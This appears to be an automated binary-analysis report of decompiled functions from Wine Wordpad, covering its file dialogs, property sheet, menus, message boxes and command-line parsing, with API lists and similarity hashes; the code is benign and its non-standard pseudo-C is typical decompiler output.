Uniqueness Score: -1.00%

Function 00403CCC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00403CCC(void* __esi) {
				char* _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HINSTANCE__* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				struct _PROPSHEETHEADER _v56;
				char _v108;
				signed int _v136;
				struct HINSTANCE__* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				struct HINSTANCE__* _v160;
				intOrPtr _v164;
				char _v168;
				struct HINSTANCE__* _t39;
				char* _t40;
				char* _t42;
				struct HINSTANCE__* _t54;
				char* _t56;
				void* _t58;
				struct HINSTANCE__* _t64;
				intOrPtr* _t66;

				_t39 = GetModuleHandleW(0);
				_t64 = _t39;
				_v168 = 0x38;
				_v164 = 8;
				_v156 = 0x838;
				_v144 = E00403E95;
				_v160 = _t64;
				0x400000(1);
				_v136 = _v136 & 0x00000000;
				_v140 = _t39;
				_t58 = 1;
				_t40 =  &_v168;
				_v148 = 0x599;
				0x400000(_t40);
				if(_t40 > 1) {
					_t66 =  &_v108;
					do {
						 *((intOrPtr*)(_t66 - 4)) = _v168;
						 *_t66 = _v164;
						 *((intOrPtr*)(_t66 + 8)) = _v156;
						 *((intOrPtr*)(_t66 + 0x14)) = _v144;
						_t54 = _v160;
						 *(_t66 + 4) = _t54;
						0x400000(2);
						 *(_t66 + 0x18) = _t54;
						_t66 = _t66 + 0x38;
						_t58 = _t58 + 1;
						 *(_t66 - 0x1c) = _v136;
						_t56 =  &_v168;
						 *((intOrPtr*)(_t66 - 0x28)) = 0x59a;
						0x400000(_t56);
					} while (_t58 < _t56);
				}
				_v48 =  *0x408028;
				_t42 =  &_v168;
				_v56 = 0x34;
				_v52 = 0x8c;
				_v44 = _t64;
				_v36 = 0x598;
				0x400000(_t42);
				_v32 = _t42;
				_v24 =  &_v168;
				_t46 = ( *0x408010 & 0x000000ff) >> 0x00000001 & 0x00000001;
				_v40 = 0x66;
				_v28 = ( *0x408010 & 0x000000ff) >> 0x00000001 & 0x00000001;
				PropertySheetW( &_v56);
				return E00404F21(_t46);
			}

0x00403cd9
0x00403cdf
0x00403ce1
0x00403ced
0x00403cf7
0x00403d01
0x00403d0b
0x00403d11
0x00403d16
0x00403d1f
0x00403d25
0x00403d26
0x00403d2c
0x00403d37
0x00403d40
0x00403d43
0x00403d46
0x00403d4c
0x00403d55
0x00403d5d
0x00403d66
0x00403d69
0x00403d71
0x00403d74
0x00403d79
0x00403d7c
0x00403d85
0x00403d86
0x00403d89
0x00403d8f
0x00403d97
0x00403d9e
0x00403da2
0x00403da8
0x00403dab
0x00403db2
0x00403db9
0x00403dc0
0x00403dc3
0x00403dca
0x00403dcf
0x00403dd8
0x00403de4
0x00403de7
0x00403dee
0x00403df6
0x00403e04

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?), ref: 00403CD9
PropertySheetW.COMCTL32(00000034), ref: 00403DF6

Strings

8, xrefs: 00403CE1
4, xrefs: 00403DB2
f, xrefs: 00403DE7

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModulePropertySheet
String ID: 4$8$f
API String ID: 4202453805-3264364753
Opcode ID: cfd618ad35d0fac69a369acd59eb4bc650bfa2b2db662c315bf371d4401c3a93
Instruction ID: 32a5a8a3e5a774e8d063578b94254da6d7726d626ea3ee9ec8036e8faa70615a
Opcode Fuzzy Hash: cfd618ad35d0fac69a369acd59eb4bc650bfa2b2db662c315bf371d4401c3a93
Instruction Fuzzy Hash: A3314AB5D003188FDB20DF65D98578EBBF4BF49314F1044AAE589B7281DB749A888F54

Uniqueness

Uniqueness Score: -1.00%

Function 004012DB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004012DB() {
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				intOrPtr _v88;
				struct tagOFNA _v92;
				void _v612;
				void* _t25;
				void* _t31;
				void* _t35;
				int _t39;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;

				memset( &_v612, 0, 0x208);
				_t39 = 0x58;
				memset( &_v92, 0, _t39);
				_t42 = _t41 + 0x18;
				_v88 =  *0x408028;
				_v64 =  &_v612;
				_t25 = 1;
				_v92 = _t39;
				_v40 = 0x800806;
				_v80 = 0x408258;
				_v60 = 0x104;
				_v32 = 0x40632c;
				_t40 = 2;
				if( *0x408010 != 1) {
					_t25 =  ==  ? _t40 : 0;
				}
				_v68 = _t25 + 1;
				while(GetSaveFileNameW( &_v92) != 0) {
					_t38 = _v68;
					_t31 = E00403E5C(_v68 - 1);
					_t43 = _t42 + 4;
					if(_t31 == _t40) {
						L7:
						return E00401677(_t38, _v64, E00403E5C(_t38 - 1));
					}
					_t35 = E004018DD( *0x408028, 0x6a8, L"Wine Wordpad", 0x34);
					_t42 = _t43 + 0x10;
					if(_t35 != 6) {
						continue;
					}
					_t38 = _v68;
					goto L7;
				}
				return 0;
			}

0x004012f3
0x004012fa
0x00401302
0x0040130c
0x00401315
0x0040131e
0x00401323
0x00401324
0x00401327
0x0040132e
0x00401335
0x0040133c
0x00401345
0x00401348
0x0040134f
0x0040134f
0x00401353
0x00401356
0x00401364
0x0040136b
0x00401370
0x00401375
0x00401399
0x00000000
0x004013ab
0x00401389
0x0040138e
0x00401394
0x00000000
0x00000000
0x00401396
0x00000000
0x00401396
0x00000000

APIs

memset.MSVCRT ref: 004012F3
memset.MSVCRT ref: 00401302
GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,-00000006), ref: 0040135A

Strings

,c@, xrefs: 0040133C
Wine Wordpad, xrefs: 00401379

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$FileNameSave
String ID: ,c@$Wine Wordpad
API String ID: 3930119178-872660242
Opcode ID: 05caeac911368b501e29c35d0ad24f2c06dff4fe9e6c78ce805e7cddf4f088e7
Instruction ID: 6775f608a4ea4af17e5fc6ec885a8057e60743423a077e6b76c69bc0ed9318d2
Opcode Fuzzy Hash: 05caeac911368b501e29c35d0ad24f2c06dff4fe9e6c78ce805e7cddf4f088e7
Instruction Fuzzy Hash: 5F21A4B1D003089BEF10EBA1DC89B9F7BB8EB04704F10443AE506FB2D0EA7995448F98

Uniqueness

Uniqueness Score: -1.00%

Function 00404109, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00404109(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				long _v36;
				void* _v40;
				struct HWND__* _v44;
				void* _v92;
				struct HWND__* _t14;
				long _t17;
				signed int _t22;

				_t14 = SendMessageW(_a4, 0x406, 0, 0);
				if(_t14 == 0) {
					L4:
					return 0;
				}
				_v92 = 0x34;
				if(SendMessageW(_t14, 0x164, 0,  &_v92) == 0) {
					goto L4;
				}
				_t17 = SendMessageW(_v44, 0x188, 0, 0);
				if(_t17 < 0) {
					goto L4;
				}
				_v36 = _t17;
				asm("xorps xmm0, xmm0");
				_v32 = _a8;
				asm("movlpd [ebp-0x14], xmm0");
				_v28 = _a12 - 1;
				asm("movlpd [ebp-0xc], xmm0");
				_v8 = 0;
				_v40 = 1;
				_t22 = SendMessageW(_a4, 0x40d, 0,  &_v40);
				asm("sbb eax, eax");
				return  ~( ~_t22);
			}

0x00404123
0x00404127
0x0040418f
0x00000000
0x0040418f
0x0040412c
0x0040413f
0x00000000
0x00000000
0x0040414b
0x0040414f
0x00000000
0x00000000
0x00404151
0x00404154
0x0040415a
0x00404161
0x00404166
0x00404176
0x0040417b
0x0040417e
0x00404185
0x00404189
0x00000000

APIs

SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00404123
SendMessageW.USER32(00000000,00000164,00000000,?), ref: 0040413B
SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0040414B
SendMessageW.USER32(?,0000040D,00000000,?), ref: 00404185

Strings

4, xrefs: 0040412C

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: 4
API String ID: 3850602802-4088798008
Opcode ID: 55b5d0ba72d1c8cd54f4dcbcdd24ca0d6e73b61b90f04f7550c2eb6fd1838342
Instruction ID: 3e91771f6bdcbf8a12933c5471e7327fd5e520103de7502b1801deb0824885ae
Opcode Fuzzy Hash: 55b5d0ba72d1c8cd54f4dcbcdd24ca0d6e73b61b90f04f7550c2eb6fd1838342
Instruction Fuzzy Hash: 66015E71E4025EBADF10CFA6CD04DDF7FB8EBD5B50F00412ABA01FA184E6709981CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040123D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040123D() {
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				intOrPtr _v88;
				struct tagOFNA _v92;
				void _v612;
				void* _t21;
				int _t24;
				void* _t29;

				memset( &_v612, 0, 0x208);
				memset( &_v92, 0, 0x58);
				_t27 =  *0x408010;
				_v88 =  *0x408028;
				_v64 =  &_v612;
				_t21 = 1;
				_v92 = 0x58;
				_v40 = 0x801804;
				_v80 = 0x408258;
				_v60 = 0x104;
				_v32 = 0x406334;
				if( *0x408010 != 1) {
					_t29 = 2;
					_t21 =  ==  ? _t29 : 0;
				}
				_v68 = _t21 + 1;
				_t24 = GetOpenFileNameW( &_v92);
				if(_t24 != 0) {
					_t24 = E00404E0F();
					if(_t24 != 0) {
						return E004014EA(_t27, _v64);
					}
				}
				return _t24;
			}

0x00401254
0x00401261
0x0040126e
0x00401274
0x0040127d
0x00401282
0x00401283
0x0040128a
0x00401291
0x00401298
0x0040129f
0x004012a8
0x004012b1
0x004012b2
0x004012b2
0x004012b6
0x004012bd
0x004012c5
0x004012c7
0x004012ce
0x00000000
0x004012d8
0x004012ce
0x004012da

APIs

memset.MSVCRT ref: 00401254
memset.MSVCRT ref: 00401261
GetOpenFileNameW.COMDLG32(00000058), ref: 004012BD

Strings

X, xrefs: 00401283
4c@, xrefs: 0040129F

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$FileNameOpen
String ID: 4c@$X
API String ID: 458646896-1607599126
Opcode ID: 59af3902ad1904ac048420f50fb04db3a71b8349b598cbdb099c45a4ae3c3b1b
Instruction ID: 9974c1de91bf50f2d0c124dd03aa2873f4bb34ab4b58e0046ceaa444c9145836
Opcode Fuzzy Hash: 59af3902ad1904ac048420f50fb04db3a71b8349b598cbdb099c45a4ae3c3b1b
Instruction Fuzzy Hash: EC013CB1D003489ADF10DBA5DD89B9E7BB8AB04304F10847AE511FA2D1DB7895488B48

Uniqueness

Uniqueness Score: -1.00%

Function 00404DB2, Relevance: 7.5, APIs: 5, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00404DB2(void* __edi, void* __esi, void* __eflags, struct HWND__* _a4) {
				struct tagRECT _v20;
				struct HMENU__* _t9;
				struct HWND__* _t10;
				void* _t34;

				_t34 = __eflags;
				_t9 = LoadMenuW(GetModuleHandleW(0), 0x898);
				_t10 = GetDlgItem(_a4, 0x7d1);
				E00404F21(_t34);
				ShowWindow(_t10, 1);
				0x400000(_a4, __edi, __esi);
				SetMenu(_a4, _t9);
				0x400000(_a4);
				_pop(_t29);
				GetClientRect( *0x408028,  &_v20);
				return E00402DED(_v20.right & 0x0000ffff,  *0x408028, 0, (_v20.bottom & 0x0000ffff) << 0x00000010 | _v20.right & 0x0000ffff);
			}

0x00404db2
0x00404dc5
0x00404dd5
0x00404ddd
0x00404de5
0x00404dee
0x00404df8
0x00404e01
0x00404e09
0x00405934
0x00405959

APIs

GetModuleHandleW.KERNEL32(00000000,00000898,?,?,?,004034FA,?), ref: 00404DBE
LoadMenuW.USER32 ref: 00404DC5
GetDlgItem.USER32 ref: 00404DD5
ShowWindow.USER32(00000000,00000001,?,?,?,004034FA,?), ref: 00404DE5
SetMenu.USER32(?,00000000,?,?,004034FA,?), ref: 00404DF8

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$HandleItemLoadModuleShowWindow
String ID:
API String ID: 4170653383-0
Opcode ID: 32f988506bdb44f405ecd5d2be4178cd4e3daa72e52b935bb56126085f817d1b
Instruction ID: 524233ea10abe5d1a8d8a900ca17120f623e2d90e147c674d92614b38dd91241
Opcode Fuzzy Hash: 32f988506bdb44f405ecd5d2be4178cd4e3daa72e52b935bb56126085f817d1b
Instruction Fuzzy Hash: 0AF01232144204BBDB102BA1ED0DF5D3E65EB45765F114435F60A690A1CA7644519B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040179C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040179C(void* __ecx, void* __edi, void* __esi, signed int _a4) {
				RECT* _v8;
				signed short _t17;
				signed short _t20;
				signed int _t21;
				int _t22;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				signed short _t28;
				signed short _t29;
				void* _t31;
				void* _t32;
				signed short* _t38;
				signed short _t39;
				void* _t42;
				signed short _t44;
				signed short* _t46;
				void* _t47;
				signed int _t48;
				void* _t50;
				WCHAR* _t53;
				signed short _t55;

				_t50 = __esi;
				_t47 = __edi;
				_t38 = _a4;
				_v8 = 0;
				_t17 =  *_t38 & 0x0000ffff;
				_t31 = 0x20;
				_t44 = _t17;
				if(_t17 == _t31) {
					do {
						_t38 =  &(_t38[1]);
						_t29 =  *_t38 & 0x0000ffff;
					} while (_t29 == _t31);
					_t44 = _t29;
				}
				_push(_t50);
				_push(_t47);
				_t32 = 0x22;
				_t19 =  ==  ? _t32 : _t31;
				_t48 = ( ==  ? _t32 : _t31) & 0x0000ffff;
				_t20 = _t44 & 0x0000ffff;
				_a4 = _t48;
				if(_t44 == _t48) {
					_t4 =  &(_t38[1]); // 0x619c3d8b
					_t20 =  *_t4 & 0x0000ffff;
				}
				_t5 =  &(_t38[1]); // 0x4033fe
				_t46 =  !=  ? _t38 : _t5;
				_t39 = _t20 & 0x0000ffff;
				if(_t20 != 0) {
					_t55 = _t20 & 0x0000ffff;
					while(1) {
						_t39 = _t55 & 0x0000ffff;
						if(_t55 == _t48) {
							goto L9;
						}
						_t46 =  &(_t46[1]);
						_t28 =  *_t46 & 0x0000ffff;
						_t55 = _t28;
						_t39 = _t28;
						if(_t28 != 0) {
							continue;
						}
						goto L9;
					}
				}
				L9:
				_t21 = _t39 & 0x0000ffff;
				if(_t39 == _t48) {
					_t6 =  &(_t46[1]); // 0x40619c
					_t21 =  *_t6 & 0x0000ffff;
				}
				_t8 =  &(_t46[1]); // 0x403400
				_t53 =  !=  ? _t46 : _t8;
				if(_t21 != 0) {
					do {
						_t42 = 0x20;
						while(1) {
							_t25 =  *_t53 & 0x0000ffff;
							if(_t25 != _t42 && _t25 != 9) {
								break;
							}
							_t53 =  &(_t53[1]);
						}
						if(_t25 == 0x2d || _t25 == 0x2f) {
							_t9 =  &(_t53[2]); // 0x598c458d
							_t26 =  *_t9 & 0x0000ffff;
							if(_t26 == 0) {
								L20:
								_t10 =  &(_t53[1]); // 0x458d0040
								_t27 =  *_t10 & 0x0000ffff;
								if(_t27 == 0x50 || _t27 == 0x70) {
									goto L22;
								}
							} else {
								__imp__isspace(_t26);
								if(_t26 != 0) {
									goto L20;
								}
							}
						}
						goto L23;
						L22:
						_t53 =  &(_t53[2]);
						_v8 = 1;
					} while ( *_t53 != 0);
				}
				L23:
				_t22 =  *_t53 & 0x0000ffff;
				if(_t22 != 0) {
					_push(0x22);
					_pop(0);
					if(_t22 == 0) {
						_t53 =  &(_t53[1]);
						 *((short*)(_t53 + lstrlenW(_t53) * 2 - 2)) = 0;
					}
					E004014EA(0, _t53);
					_t22 = InvalidateRect( *0x408028, 0, 0);
				}
				if(_v8 != 0) {
					_t22 = E004018DD( *0x408028, 0x6af, L"Wine Wordpad", 0);
				}
				return _t22;
			}

0x0040179c
0x0040179c
0x004017a0
0x004017a8
0x004017ab
0x004017ae
0x004017af
0x004017b4
0x004017b6
0x004017b6
0x004017b9
0x004017bc
0x004017c1
0x004017c1
0x004017c3
0x004017c4
0x004017cc
0x004017d0
0x004017d3
0x004017d6
0x004017db
0x004017e1
0x004017e3
0x004017e3
0x004017e3
0x004017ea
0x004017ed
0x004017f0
0x004017f6
0x004017f8
0x004017fb
0x004017fb
0x00401801
0x00000000
0x00000000
0x00401803
0x00401806
0x00401809
0x0040180b
0x00401810
0x00000000
0x00000000
0x00000000
0x00401810
0x004017fb
0x00401812
0x00401815
0x0040181b
0x0040181d
0x0040181d
0x0040181d
0x00401825
0x00401828
0x00401830
0x00401832
0x00401834
0x00401835
0x00401835
0x0040183b
0x00000000
0x00000000
0x00401842
0x00401842
0x0040184a
0x00401851
0x00401851
0x00401858
0x00401866
0x00401866
0x00401866
0x0040186d
0x00000000
0x00000000
0x0040185a
0x0040185b
0x00401864
0x00000000
0x00000000
0x00401864
0x00401858
0x00000000
0x00401874
0x00401874
0x00401877
0x0040187e
0x00401832
0x00401883
0x00401883
0x00401889
0x0040188b
0x0040188d
0x00401891
0x00401893
0x0040189f
0x0040189f
0x004018a5
0x004018b3
0x004018b3
0x004018bf
0x004018d2
0x004018d7
0x004018dc

APIs

isspace.MSVCRT ref: 0040185B
lstrlenW.KERNEL32(004033FE,00000000,7741BB20,00000000,?,?,004033FC,00000000), ref: 00401897
InvalidateRect.USER32(00000000,00000000,00000000,7741BB20,00000000,?,?,004033FC,00000000), ref: 004018B3

Strings

Wine Wordpad, xrefs: 004018C2

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: InvalidateRectisspacelstrlen
String ID: Wine Wordpad
API String ID: 114541062-1917673877
Opcode ID: 171615bab982a696a699317516edca27ce54a607b6099b9b7125bc4ebebbf63e
Instruction ID: d12091ae9bf498818b955643f8cf630ce38ad84ef2f86656b1fc410b9aff6f44
Opcode Fuzzy Hash: 171615bab982a696a699317516edca27ce54a607b6099b9b7125bc4ebebbf63e
Instruction Fuzzy Hash: F531036690012196DB347B5998416B772E5EF14761BA5C03BFCC5FB2E0E73CCE81D268

Uniqueness

Uniqueness Score: -1.00%

Function 004044E2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 004044F0
wcstod.MSVCRT ref: 00404501
_errno.MSVCRT ref: 00404529

Strings

}F@, xrefs: 00404507, 00404539

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$wcstod
String ID: }F@
API String ID: 694737364-1939311362
Opcode ID: 29567d758b7e9d5c467fdd711f959a7c174d442a0d8bbcf42bb2a13401829963
Instruction ID: a06537ca03e974aacba9f730345a82a51b2140339f809485e4f3b8094bd09900
Opcode Fuzzy Hash: 29567d758b7e9d5c467fdd711f959a7c174d442a0d8bbcf42bb2a13401829963
Instruction Fuzzy Hash: 2F01D672400605FFDB129F64DC547AA77B8FF46332F11827AE61ABA190E7389880DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004045B1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045B1(WCHAR* _a4) {
				short _v94;
				void _v116;
				void* _v120;
				int _t12;

				memset( &_v116, 0, 0x70);
				_v120 = 0x74;
				SendMessageW( *0x40802c, 0x43a, 1,  &_v120);
				_t12 = lstrcmpW( &_v94, _a4);
				if(_t12 != 0) {
					return E0040508E(_a4);
				}
				return _t12;
			}

0x004045bf
0x004045c7
0x004045df
0x004045ec
0x004045f4
0x00000000
0x004045fe
0x00404600

APIs

memset.MSVCRT ref: 004045BF
SendMessageW.USER32(0000043A,00000001,00000074), ref: 004045DF
lstrcmpW.KERNEL32(?,?), ref: 004045EC

Part of subcall function 0040508E: GetDlgItem.USER32 ref: 004050A8
Part of subcall function 0040508E: GetDlgItem.USER32 ref: 004050B2
Part of subcall function 0040508E: GetDlgItem.USER32 ref: 004050BC
Part of subcall function 0040508E: SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 004050CE
Part of subcall function 0040508E: memset.MSVCRT ref: 004050DA
Part of subcall function 0040508E: lstrcpyW.KERNEL32 ref: 004050F7
Part of subcall function 0040508E: SendMessageW.USER32(00000444,00000001,00000074), ref: 0040510E
Part of subcall function 0040508E: SendMessageW.USER32(00000000,0000000C,00000000,004045FE), ref: 0040511F

Strings

t, xrefs: 004045C7

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$memset$lstrcmplstrcpy
String ID: t
API String ID: 1049223827-2238339752
Opcode ID: 19318aa074b3dbd29d55790ef23ac2358ff58f28f0167fcfdb14c0260ec8a186
Instruction ID: bf5de6b5632de5637322d6f9322767a6d5b7b807835904bf4e60707197903c08
Opcode Fuzzy Hash: 19318aa074b3dbd29d55790ef23ac2358ff58f28f0167fcfdb14c0260ec8a186
Instruction Fuzzy Hash: 66F03071940208BBEF10ABA1DD06F8E3B7CAB00704F204139F605BB0D1D7B596188B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040377C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040377C(struct HWND__* _a4, intOrPtr _a8) {
				short _v12;
				WCHAR* _v40;
				signed int _v44;
				void* _v48;

				_v44 = _v44 | 0xffffffff;
				_v48 = 1;
				wsprintfW( &_v12, L"%2d", _a8);
				_v40 =  &_v12;
				return SendMessageW(_a4, 0x40b, 0,  &_v48);
			}

0x00403785
0x00403792
0x00403799
0x004037a5
0x004037bd

APIs

wsprintfW.USER32 ref: 00403799
SendMessageW.USER32(?,0000040B,00000000,?), ref: 004037B6

Strings

%2d, xrefs: 0040378C
YX@, xrefs: 0040377C

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendwsprintf
String ID: %2d$YX@
API String ID: 3751067900-1835664884
Opcode ID: 2993d0ae794b7a0124f5340a94c901250cd59d15d7558076ac30513baed618cd
Instruction ID: f3919a39ab248099576b6670e423f0e95e6a7c3e4704e32358fd7fe472a7c0ad
Opcode Fuzzy Hash: 2993d0ae794b7a0124f5340a94c901250cd59d15d7558076ac30513baed618cd
Instruction Fuzzy Hash: 4DE0ED7090020CAFDB00EFA4DD46ACD7FB8EB08314F108165E956B51D1E3B196558BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004018DD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004018DD(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct %anon393 _v44;

				_v44.cbSize = 0x28;
				_v44.hwndOwner = _a4;
				_v44.hInstance = GetModuleHandleW(0);
				_v44.lpszText = _a8;
				_v44.lpszCaption = _a12;
				_v44.dwStyle = _a16;
				_v44.lpszIcon = 0;
				_v44.dwContextHelpId = 0;
				_v44.lpfnMsgBoxCallback = 0;
				_v44.dwLanguageId = 0;
				return MessageBoxIndirectW( &_v44);
			}

0x004018e9
0x004018f1
0x004018fa
0x00401900
0x00401906
0x0040190c
0x00401913
0x00401916
0x00401919
0x0040191c
0x00401927

APIs

GetModuleHandleW.KERNEL32(00000000,7741BB20), ref: 004018F4
MessageBoxIndirectW.USER32(00000028), ref: 0040191F

Strings

(, xrefs: 004018E9

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleIndirectMessageModule
String ID: (
API String ID: 1360086187-3887548279
Opcode ID: 9c32817e2237ef5effb8d86bd21e99caffc477f85d8eb42c549c7671ec46684f
Instruction ID: f95d0243bc160a49a5f963359d9e72b98d29788b64cd0b2789a295e635950126
Opcode Fuzzy Hash: 9c32817e2237ef5effb8d86bd21e99caffc477f85d8eb42c549c7671ec46684f
Instruction Fuzzy Hash: 60F05FB5D112299FCB40DFA8D9445CEBBF8FB0C610F10855AE815F3200D7749A548FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405126, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00405126() {
				void* _v108;
				intOrPtr _v116;
				void* _v120;
				void* _t7;

				_t7 = memset( &_v120, 0, 0x74);
				asm("movss xmm0, [ebp+0x8]");
				asm("cvtps2pd xmm0, xmm0");
				_v120 = 0x74;
				_v116 = 0x80000000;
				asm("mulsd xmm0, [0x406500]");
				asm("cvttsd2si eax, xmm0");
				_v108 = _t7;
				return SendMessageW( *0x40802c, 0x444, 1,  &_v120);
			}

0x00405134
0x00405139
0x00405141
0x00405144
0x0040514b
0x00405152
0x0040515a
0x0040515e
0x00405179

APIs

memset.MSVCRT ref: 00405134
SendMessageW.USER32(00000444,00000001,00000074), ref: 00405172

Strings

t, xrefs: 00405144

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendmemset
String ID: t
API String ID: 568519121-2238339752
Opcode ID: 602a4a64124329a7395ef13de137f54a1a2cc13025a069c20d10e3ebbeab0296
Instruction ID: 1e8835eeb00f0ed9fb23db6df1f8fd0c543f0865d25f8bd661550be9934d5a11
Opcode Fuzzy Hash: 602a4a64124329a7395ef13de137f54a1a2cc13025a069c20d10e3ebbeab0296
Instruction Fuzzy Hash: 50F030B0810309AAEB11DB719D55B8DB77CAB41708F204339A605BB191E7B59654CE44

Uniqueness

Uniqueness Score: -1.00%

Function 0040517A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040517A(char _a4) {
				struct HWND__* _t3;
				int _t4;

				_t3 = GetDlgItem( *0x408028, 0x7d0);
				_t1 =  &_a4; // 0x404f7c
				asm("sbb ecx, ecx");
				_t4 = ShowWindow(_t3,  ~( *_t1) & 0x00000005);
				_t2 =  &_a4; // 0x404f7c
				return E0040526E(_t4, 1,  *_t2);
			}

0x00405188
0x0040518e
0x00405193
0x0040519a
0x004051a0
